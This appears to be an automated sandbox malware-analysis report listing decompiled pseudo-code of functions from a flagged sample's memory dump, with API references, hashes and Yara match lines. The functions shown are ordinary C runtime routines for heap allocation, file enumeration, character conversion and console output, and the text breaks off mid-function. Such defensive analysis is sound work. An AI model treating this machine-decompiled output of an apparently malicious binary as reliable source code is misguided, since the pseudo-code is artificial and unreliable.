                                        • Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
                                        • Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
                                        • Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E00403E3D(void* __ecx, long _a4) {
                                        				void* _t4;
                                        				void* _t6;
                                        				void* _t7;
                                        				long _t8;
                                        
                                        				_t7 = __ecx;
                                        				_t8 = _a4;
                                        				if(_t8 > 0xffffffe0) {
                                        					L7:
                                        					 *((intOrPtr*)(E00404831())) = 0xc;
                                        					__eflags = 0;
                                        					return 0;
                                        				}
                                        				if(_t8 == 0) {
                                        					_t8 = _t8 + 1;
                                        				}
                                        				while(1) {
                                        					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                        					if(_t4 != 0) {
                                        						break;
                                        					}
                                        					__eflags = E00403829();
                                        					if(__eflags == 0) {
                                        						goto L7;
                                        					}
                                        					_t6 = E004068FD(_t7, __eflags, _t8);
                                        					_pop(_t7);
                                        					__eflags = _t6;
                                        					if(_t6 == 0) {
                                        						goto L7;
                                        					}
                                        				}
                                        				return _t4;
                                        			}








                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                        • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                        • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                        • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.727088778.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d93a2252448cd9e914cf663f38a833380aec50827b123031932ddd029ee8d8f
                                        • Instruction ID: 665b07bfa1f7c352fd2c203460ac9e28d91f13363c0ac1da9e435cdbd4b70480
                                        • Opcode Fuzzy Hash: 4d93a2252448cd9e914cf663f38a833380aec50827b123031932ddd029ee8d8f
                                        • Instruction Fuzzy Hash: 73012B71408348AAE7204E22DCC0777BBDAEF45768F1DC41AEE440B246CB79D845C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.727088778.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2742b0ccd2bcf4bc1e739734afe9b71e6a07a4ccd0d2b825c37c5d6f64ce443f
                                        • Instruction ID: 6a11073bf5accc629b2e7f7385b61dc0cfb559f5770e7ddd8fdd29053dc77469
                                        • Opcode Fuzzy Hash: 2742b0ccd2bcf4bc1e739734afe9b71e6a07a4ccd0d2b825c37c5d6f64ce443f
                                        • Instruction Fuzzy Hash: DD01296140E3C49FD7128B258C94B62BFB49F53224F1EC1DBD9848F2A7C2699849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 72%
                                        			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                        				intOrPtr _v8;
                                        				signed int _v12;
                                        				intOrPtr _v28;
                                        				signed int _v32;
                                        				WCHAR* _v36;
                                        				signed int _v48;
                                        				intOrPtr _v556;
                                        				intOrPtr _v558;
                                        				struct _WIN32_FIND_DATAW _v604;
                                        				intOrPtr* _v608;
                                        				signed int _v612;
                                        				signed int _v616;
                                        				intOrPtr _v644;
                                        				intOrPtr _v648;
                                        				void* __edi;
                                        				signed int _t40;
                                        				signed int _t45;
                                        				signed int _t48;
                                        				signed int _t50;
                                        				signed int _t51;
                                        				signed char _t53;
                                        				signed int _t62;
                                        				void* _t64;
                                        				union _FINDEX_INFO_LEVELS _t66;
                                        				union _FINDEX_INFO_LEVELS _t67;
                                        				signed int _t70;
                                        				intOrPtr* _t71;
                                        				signed int _t74;
                                        				void* _t80;
                                        				void* _t82;
                                        				signed int _t83;
                                        				void* _t87;
                                        				WCHAR* _t88;
                                        				intOrPtr* _t92;
                                        				intOrPtr _t95;
                                        				void* _t97;
                                        				signed int _t98;
                                        				intOrPtr* _t102;
                                        				signed int _t105;
                                        				void* _t108;
                                        				intOrPtr _t109;
                                        				void* _t110;
                                        				void* _t112;
                                        				void* _t113;
                                        				signed int _t115;
                                        				void* _t116;
                                        				union _FINDEX_INFO_LEVELS _t117;
                                        				void* _t121;
                                        				void* _t122;
                                        				void* _t123;
                                        				signed int _t124;
                                        				void* _t125;
                                        				signed int _t130;
                                        				void* _t131;
                                        				signed int _t132;
                                        				void* _t133;
                                        				void* _t134;
                                        
                                        				_push(__ecx);
                                        				_t92 = _a4;
                                        				_t2 = _t92 + 2; // 0x2
                                        				_t108 = _t2;
                                        				do {
                                        					_t40 =  *_t92;
                                        					_t92 = _t92 + 2;
                                        				} while (_t40 != 0);
                                        				_t115 = _a12;
                                        				_t95 = (_t92 - _t108 >> 1) + 1;
                                        				_v8 = _t95;
                                        				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
                                        					_t5 = _t115 + 1; // 0x1
                                        					_t87 = _t5 + _t95;
                                        					_t122 = E00403ECE(_t95, _t87, 2);
                                        					_t97 = _t121;
                                        					__eflags = _t115;
                                        					if(_t115 == 0) {
                                        						L6:
                                        						_push(_v8);
                                        						_t87 = _t87 - _t115;
                                        						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
                                        						_t132 = _t131 + 0x10;
                                        						__eflags = _t45;
                                        						if(__eflags != 0) {
                                        							goto L9;
                                        						} else {
                                        							_t80 = E00404CA2(_a16, __eflags, _t122);
                                        							E00403E03(0);
                                        							_t82 = _t80;
                                        							goto L8;
                                        						}
                                        					} else {
                                        						_push(_t115);
                                        						_t83 = E004047AD(_t97, _t122, _t87, _a8);
                                        						_t132 = _t131 + 0x10;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							L9:
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							E00404649();
                                        							asm("int3");
                                        							_t130 = _t132;
                                        							_t133 = _t132 - 0x260;
                                        							_t48 =  *0x412014; // 0x368bd1fa
                                        							_v48 = _t48 ^ _t130;
                                        							_t109 = _v28;
                                        							_t98 = _v32;
                                        							_push(_t87);
                                        							_t88 = _v36;
                                        							_push(_t122);
                                        							_push(_t115);
                                        							_t123 = 0x5c;
                                        							_v644 = _t109;
                                        							_v648 = 0x2f;
                                        							_t116 = 0x3a;
                                        							while(1) {
                                        								__eflags = _t98 - _t88;
                                        								if(_t98 == _t88) {
                                        									break;
                                        								}
                                        								_t50 =  *_t98 & 0x0000ffff;
                                        								__eflags = _t50 - _v612;
                                        								if(_t50 != _v612) {
                                        									__eflags = _t50 - _t123;
                                        									if(_t50 != _t123) {
                                        										__eflags = _t50 - _t116;
                                        										if(_t50 != _t116) {
                                        											_t98 = _t98 - 2;
                                        											__eflags = _t98;
                                        											continue;
                                        										}
                                        									}
                                        								}
                                        								break;
                                        							}
                                        							_t124 =  *_t98 & 0x0000ffff;
                                        							__eflags = _t124 - _t116;
                                        							if(_t124 != _t116) {
                                        								L19:
                                        								_t51 = _t124;
                                        								_t117 = 0;
                                        								_t110 = 0x2f;
                                        								__eflags = _t51 - _t110;
                                        								if(_t51 == _t110) {
                                        									L23:
                                        									_t53 = 1;
                                        									__eflags = 1;
                                        								} else {
                                        									_t112 = 0x5c;
                                        									__eflags = _t51 - _t112;
                                        									if(_t51 == _t112) {
                                        										goto L23;
                                        									} else {
                                        										_t113 = 0x3a;
                                        										__eflags = _t51 - _t113;
                                        										if(_t51 == _t113) {
                                        											goto L23;
                                        										} else {
                                        											_t53 = 0;
                                        										}
                                        									}
                                        								}
                                        								_t101 = (_t98 - _t88 >> 1) + 1;
                                        								asm("sbb eax, eax");
                                        								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
                                        								E00402460(_t117,  &_v604, _t117, 0x250);
                                        								_t134 = _t133 + 0xc;
                                        								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
                                        								__eflags = _t125 - 0xffffffff;
                                        								if(_t125 != 0xffffffff) {
                                        									_t102 = _v608;
                                        									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
                                        									__eflags = _t62;
                                        									_v616 = _t62 >> 2;
                                        									_t64 = 0x2e;
                                        									do {
                                        										__eflags = _v604.cFileName - _t64;
                                        										if(_v604.cFileName != _t64) {
                                        											L36:
                                        											_push(_t102);
                                        											_t66 = E00404A29(_t102,  &(_v604.cFileName), _t88, _v612);
                                        											_t134 = _t134 + 0x10;
                                        											__eflags = _t66;
                                        											if(_t66 != 0) {
                                        												goto L26;
                                        											} else {
                                        												goto L37;
                                        											}
                                        										} else {
                                        											__eflags = _v558 - _t117;
                                        											if(_v558 == _t117) {
                                        												goto L37;
                                        											} else {
                                        												__eflags = _v558 - _t64;
                                        												if(_v558 != _t64) {
                                        													goto L36;
                                        												} else {
                                        													__eflags = _v556 - _t117;
                                        													if(_v556 == _t117) {
                                        														goto L37;
                                        													} else {
                                        														goto L36;
                                        													}
                                        												}
                                        											}
                                        										}
                                        										goto L40;
                                        										L37:
                                        										_t70 = FindNextFileW(_t125,  &_v604);
                                        										_t102 = _v608;
                                        										__eflags = _t70;
                                        										_t64 = 0x2e;
                                        									} while (_t70 != 0);
                                        									_t71 = _t102;
                                        									_t105 = _v616;
                                        									_t111 =  *_t71;
                                        									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
                                        									__eflags = _t105 - _t74;
                                        									if(_t105 != _t74) {
                                        										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
                                        									}
                                        								} else {
                                        									_push(_v608);
                                        									_t66 = E00404A29(_t101, _t88, _t117, _t117);
                                        									L26:
                                        									_t117 = _t66;
                                        								}
                                        								__eflags = _t125 - 0xffffffff;
                                        								if(_t125 != 0xffffffff) {
                                        									FindClose(_t125);
                                        								}
                                        								_t67 = _t117;
                                        							} else {
                                        								__eflags = _t98 -  &(_t88[1]);
                                        								if(_t98 ==  &(_t88[1])) {
                                        									goto L19;
                                        								} else {
                                        									_push(_t109);
                                        									_t67 = E00404A29(_t98, _t88, 0, 0);
                                        								}
                                        							}
                                        							__eflags = _v12 ^ _t130;
                                        							E004018CC();
                                        							return _t67;
                                        						} else {
                                        							goto L6;
                                        						}
                                        					}
                                        				} else {
                                        					_t82 = 0xc;
                                        					L8:
                                        					return _t82;
                                        				}
                                        				L40:
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: a75e177558c569fd39184c31dfa081bd759cdd70b54121f1ff0abb0e518020ef
                                        • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                        • Opcode Fuzzy Hash: a75e177558c569fd39184c31dfa081bd759cdd70b54121f1ff0abb0e518020ef
                                        • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 70%
                                        			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                        				signed int _v8;
                                        				int _v12;
                                        				void* _v24;
                                        				signed int _t49;
                                        				signed int _t54;
                                        				int _t56;
                                        				signed int _t58;
                                        				short* _t60;
                                        				signed int _t64;
                                        				short* _t68;
                                        				int _t76;
                                        				short* _t79;
                                        				signed int _t85;
                                        				signed int _t88;
                                        				void* _t93;
                                        				void* _t94;
                                        				int _t96;
                                        				short* _t99;
                                        				int _t101;
                                        				int _t103;
                                        				signed int _t104;
                                        				short* _t105;
                                        				void* _t108;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t49 =  *0x412014; // 0x368bd1fa
                                        				_v8 = _t49 ^ _t104;
                                        				_t101 = _a20;
                                        				if(_t101 > 0) {
                                        					_t76 = E004080D8(_a16, _t101);
                                        					_t108 = _t76 - _t101;
                                        					_t4 = _t76 + 1; // 0x1
                                        					_t101 = _t4;
                                        					if(_t108 >= 0) {
                                        						_t101 = _t76;
                                        					}
                                        				}
                                        				_t96 = _a32;
                                        				if(_t96 == 0) {
                                        					_t96 =  *( *_a4 + 8);
                                        					_a32 = _t96;
                                        				}
                                        				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                        				_v12 = _t54;
                                        				if(_t54 == 0) {
                                        					L38:
                                        					E004018CC();
                                        					return _t54;
                                        				} else {
                                        					_t93 = _t54 + _t54;
                                        					_t83 = _t93 + 8;
                                        					asm("sbb eax, eax");
                                        					if((_t93 + 0x00000008 & _t54) == 0) {
                                        						_t79 = 0;
                                        						__eflags = 0;
                                        						L14:
                                        						if(_t79 == 0) {
                                        							L36:
                                        							_t103 = 0;
                                        							L37:
                                        							E004063D5(_t79);
                                        							_t54 = _t103;
                                        							goto L38;
                                        						}
                                        						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                        						_t119 = _t56;
                                        						if(_t56 == 0) {
                                        							goto L36;
                                        						}
                                        						_t98 = _v12;
                                        						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                        						_t103 = _t58;
                                        						if(_t103 == 0) {
                                        							goto L36;
                                        						}
                                        						if((_a12 & 0x00000400) == 0) {
                                        							_t94 = _t103 + _t103;
                                        							_t85 = _t94 + 8;
                                        							__eflags = _t94 - _t85;
                                        							asm("sbb eax, eax");
                                        							__eflags = _t85 & _t58;
                                        							if((_t85 & _t58) == 0) {
                                        								_t99 = 0;
                                        								__eflags = 0;
                                        								L30:
                                        								__eflags = _t99;
                                        								if(__eflags == 0) {
                                        									L35:
                                        									E004063D5(_t99);
                                        									goto L36;
                                        								}
                                        								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                        								__eflags = _t60;
                                        								if(_t60 == 0) {
                                        									goto L35;
                                        								}
                                        								_push(0);
                                        								_push(0);
                                        								__eflags = _a28;
                                        								if(_a28 != 0) {
                                        									_push(_a28);
                                        									_push(_a24);
                                        								} else {
                                        									_push(0);
                                        									_push(0);
                                        								}
                                        								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                        								__eflags = _t103;
                                        								if(_t103 != 0) {
                                        									E004063D5(_t99);
                                        									goto L37;
                                        								} else {
                                        									goto L35;
                                        								}
                                        							}
                                        							_t88 = _t94 + 8;
                                        							__eflags = _t94 - _t88;
                                        							asm("sbb eax, eax");
                                        							_t64 = _t58 & _t88;
                                        							_t85 = _t94 + 8;
                                        							__eflags = _t64 - 0x400;
                                        							if(_t64 > 0x400) {
                                        								__eflags = _t94 - _t85;
                                        								asm("sbb eax, eax");
                                        								_t99 = E00403E3D(_t85, _t64 & _t85);
                                        								_pop(_t85);
                                        								__eflags = _t99;
                                        								if(_t99 == 0) {
                                        									goto L35;
                                        								}
                                        								 *_t99 = 0xdddd;
                                        								L28:
                                        								_t99 =  &(_t99[4]);
                                        								goto L30;
                                        							}
                                        							__eflags = _t94 - _t85;
                                        							asm("sbb eax, eax");
                                        							E004018E0();
                                        							_t99 = _t105;
                                        							__eflags = _t99;
                                        							if(_t99 == 0) {
                                        								goto L35;
                                        							}
                                        							 *_t99 = 0xcccc;
                                        							goto L28;
                                        						}
                                        						_t68 = _a28;
                                        						if(_t68 == 0) {
                                        							goto L37;
                                        						}
                                        						_t123 = _t103 - _t68;
                                        						if(_t103 > _t68) {
                                        							goto L36;
                                        						}
                                        						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                        						if(_t103 != 0) {
                                        							goto L37;
                                        						}
                                        						goto L36;
                                        					}
                                        					asm("sbb eax, eax");
                                        					_t70 = _t54 & _t93 + 0x00000008;
                                        					_t83 = _t93 + 8;
                                        					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                        						__eflags = _t93 - _t83;
                                        						asm("sbb eax, eax");
                                        						_t79 = E00403E3D(_t83, _t70 & _t83);
                                        						_pop(_t83);
                                        						__eflags = _t79;
                                        						if(__eflags == 0) {
                                        							goto L36;
                                        						}
                                        						 *_t79 = 0xdddd;
                                        						L12:
                                        						_t79 =  &(_t79[4]);
                                        						goto L14;
                                        					}
                                        					asm("sbb eax, eax");
                                        					E004018E0();
                                        					_t79 = _t105;
                                        					if(_t79 == 0) {
                                        						goto L36;
                                        					}
                                        					 *_t79 = 0xcccc;
                                        					goto L12;
                                        				}
                                        			}



























                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                        • __alloca_probe_16.LIBCMT ref: 00407961
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                        • __alloca_probe_16.LIBCMT ref: 00407A46
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                        • __freea.LIBCMT ref: 00407AB6
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        • __freea.LIBCMT ref: 00407ABF
                                        • __freea.LIBCMT ref: 00407AE4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                        • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				signed char _v15;
                                        				char _v16;
                                        				void _v24;
                                        				short _v28;
                                        				char _v31;
                                        				void _v32;
                                        				long _v36;
                                        				intOrPtr _v40;
                                        				void* _v44;
                                        				signed int _v48;
                                        				signed char* _v52;
                                        				long _v56;
                                        				int _v60;
                                        				void* __ebx;
                                        				signed int _t78;
                                        				signed int _t80;
                                        				int _t86;
                                        				void* _t93;
                                        				long _t96;
                                        				void _t104;
                                        				void* _t111;
                                        				signed int _t115;
                                        				signed int _t118;
                                        				signed char _t123;
                                        				signed char _t128;
                                        				intOrPtr _t129;
                                        				signed int _t131;
                                        				signed char* _t133;
                                        				intOrPtr* _t136;
                                        				signed int _t138;
                                        				void* _t139;
                                        
                                        				_t78 =  *0x412014; // 0x368bd1fa
                                        				_v8 = _t78 ^ _t138;
                                        				_t80 = _a8;
                                        				_t118 = _t80 >> 6;
                                        				_t115 = (_t80 & 0x0000003f) * 0x30;
                                        				_t133 = _a12;
                                        				_v52 = _t133;
                                        				_v48 = _t118;
                                        				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                        				_v40 = _a16 + _t133;
                                        				_t86 = GetConsoleCP();
                                        				_t136 = _a4;
                                        				_v60 = _t86;
                                        				 *_t136 = 0;
                                        				 *((intOrPtr*)(_t136 + 4)) = 0;
                                        				 *((intOrPtr*)(_t136 + 8)) = 0;
                                        				while(_t133 < _v40) {
                                        					_v28 = 0;
                                        					_v31 =  *_t133;
                                        					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                        					_t123 =  *(_t129 + _t115 + 0x2d);
                                        					if((_t123 & 0x00000004) == 0) {
                                        						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                        							_push(1);
                                        							_push(_t133);
                                        							goto L8;
                                        						} else {
                                        							if(_t133 >= _v40) {
                                        								_t131 = _v48;
                                        								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                        								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                        								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                        							} else {
                                        								_t111 = E00407222( &_v28, _t133, 2);
                                        								_t139 = _t139 + 0xc;
                                        								if(_t111 != 0xffffffff) {
                                        									_t133 =  &(_t133[1]);
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						_t128 = _t123 & 0x000000fb;
                                        						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                        						_push(2);
                                        						_v15 = _t128;
                                        						 *(_t129 + _t115 + 0x2d) = _t128;
                                        						_push( &_v16);
                                        						L8:
                                        						_push( &_v28);
                                        						_t93 = E00407222();
                                        						_t139 = _t139 + 0xc;
                                        						if(_t93 != 0xffffffff) {
                                        							L9:
                                        							_t133 =  &(_t133[1]);
                                        							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                        							_v56 = _t96;
                                        							if(_t96 != 0) {
                                        								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                        									L19:
                                        									 *_t136 = GetLastError();
                                        								} else {
                                        									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                        									if(_v36 >= _v56) {
                                        										if(_v31 != 0xa) {
                                        											goto L16;
                                        										} else {
                                        											_t104 = 0xd;
                                        											_v32 = _t104;
                                        											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                        												goto L19;
                                        											} else {
                                        												if(_v36 >= 1) {
                                        													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                        													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                        													goto L16;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					goto L20;
                                        					L16:
                                        				}
                                        				L20:
                                        				E004018CC();
                                        				return _t136;
                                        			}




































                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                        • __fassign.LIBCMT ref: 004082E0
                                        • __fassign.LIBCMT ref: 004082FB
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                        • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                        • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                        • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 27%
                                        			E00403632(void* __ecx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _t10;
                                        				int _t12;
                                        				int _t18;
                                        				signed int _t20;
                                        
                                        				_t10 =  *0x412014; // 0x368bd1fa
                                        				_v8 = _t10 ^ _t20;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t12 =  &_v12;
                                        				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                        				if(_t12 != 0) {
                                        					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                        					_t18 = _t12;
                                        					if(_t18 != 0) {
                                        						E0040C15C();
                                        						_t12 =  *_t18(_a4);
                                        					}
                                        				}
                                        				if(_v12 != 0) {
                                        					_t12 = FreeLibrary(_v12);
                                        				}
                                        				E004018CC();
                                        				return _t12;
                                        			}










                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                        • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                        				signed int _v8;
                                        				int _v12;
                                        				char _v16;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				void* _v40;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t34;
                                        				signed int _t40;
                                        				int _t45;
                                        				int _t52;
                                        				void* _t53;
                                        				void* _t55;
                                        				int _t57;
                                        				signed int _t63;
                                        				int _t67;
                                        				short* _t71;
                                        				signed int _t72;
                                        				short* _t73;
                                        
                                        				_t34 =  *0x412014; // 0x368bd1fa
                                        				_v8 = _t34 ^ _t72;
                                        				_push(_t53);
                                        				E00403F2B(_t53,  &_v28, __edx, _a4);
                                        				_t57 = _a24;
                                        				if(_t57 == 0) {
                                        					_t52 =  *(_v24 + 8);
                                        					_t57 = _t52;
                                        					_a24 = _t52;
                                        				}
                                        				_t67 = 0;
                                        				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                        				_v12 = _t40;
                                        				if(_t40 == 0) {
                                        					L15:
                                        					if(_v16 != 0) {
                                        						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                        					}
                                        					E004018CC();
                                        					return _t67;
                                        				}
                                        				_t55 = _t40 + _t40;
                                        				_t17 = _t55 + 8; // 0x8
                                        				asm("sbb eax, eax");
                                        				if((_t17 & _t40) == 0) {
                                        					_t71 = 0;
                                        					L11:
                                        					if(_t71 != 0) {
                                        						E00402460(_t67, _t71, _t67, _t55);
                                        						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                        						if(_t45 != 0) {
                                        							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                        						}
                                        					}
                                        					L14:
                                        					E004063D5(_t71);
                                        					goto L15;
                                        				}
                                        				_t20 = _t55 + 8; // 0x8
                                        				asm("sbb eax, eax");
